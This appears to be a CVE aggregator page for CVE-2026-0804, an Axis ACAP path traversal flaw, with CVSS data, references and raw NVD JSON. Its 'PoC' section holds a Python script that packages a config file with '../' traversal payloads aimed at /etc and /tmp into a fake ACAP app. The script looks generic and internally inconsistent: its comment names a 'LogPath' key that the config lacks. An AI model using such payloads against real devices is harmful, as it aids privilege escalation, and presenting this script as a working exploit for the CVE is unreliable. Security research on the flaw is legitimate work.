CVE-2026-0804

Description

An ACAP configuration file lacked sufficient input validation, which could allow a path traversal attack leading to potential privilege escalation. This vulnerability can only be exploited if the Axis device is configured to allow the installation of unsigned ACAP applications, and if an attacker convinces the victim to install a malicious ACAP application.

CVSS Details

CVSS Score

6.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

具体受影响版本请参考 Axis 官方安全公告 (CVE-2026-0804pdf-en-US-530732.pdf)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import os
import zipfile

# Description: Proof of Concept for generating a malicious ACAP package
# This script creates a zip file containing a configuration file with a path traversal payload.

# Malicious configuration content
# The 'LogPath' attempts to write to a sensitive system location using '../'
malicious_config = """
[Application]
Name=MaliciousApp
Version=1.0

[Configuration]
# Path traversal payload
LogFile=../../../../../etc/passwd_pwned
TargetFile=../../../../../tmp/root_script.sh
"""

def generate_malicious_acap(filename):
    # Create a temporary directory structure for the ACAP
    if not os.path.exists('acap_payload'):
        os.makedirs('acap_payload')
    
    config_path = os.path.join('acap_payload', 'package.conf')
    with open(config_path, 'w') as f:
        f.write(malicious_config)
    
    # Create the ACAP package (zip file)
    with zipfile.ZipFile(filename, 'w') as zf:
        zf.write(config_path)
    
    print(f"[+] Malicious ACAP package generated: {filename}")
    print(f"[+] Payload includes path traversal in configuration.")
    print(f"[+] Note: Target device must allow installation of unsigned ACAPs.")

# Usage
if __name__ == "__main__":
    generate_malicious_acap("malicious_axis.acap")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0804
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0804
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0804/
[4] VulDB https://vuldb.com/cve/CVE-2026-0804
[5] https://www.axis.com/dam/public/51/64/ea/cve-2026-0804pdf-en-US-530732.pdf

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0804", "sourceIdentifier": "[email protected]", "published": "2026-05-12T07:16:09.597", "lastModified": "2026-05-12T07:16:09.597", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "An ACAP configuration file lacked sufficient input validation, which could allow a path traversal attack leading to potential privilege escalation. This vulnerability can only be exploited if the Axis device is configured to allow the installation of unsigned ACAP applications, and if an attacker convinces the victim to install a malicious ACAP application."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-35"}]}], "references": [{"url": "https://www.axis.com/dam/public/51/64/ea/cve-2026-0804pdf-en-US-530732.pdf", "source": "[email protected]"}]}}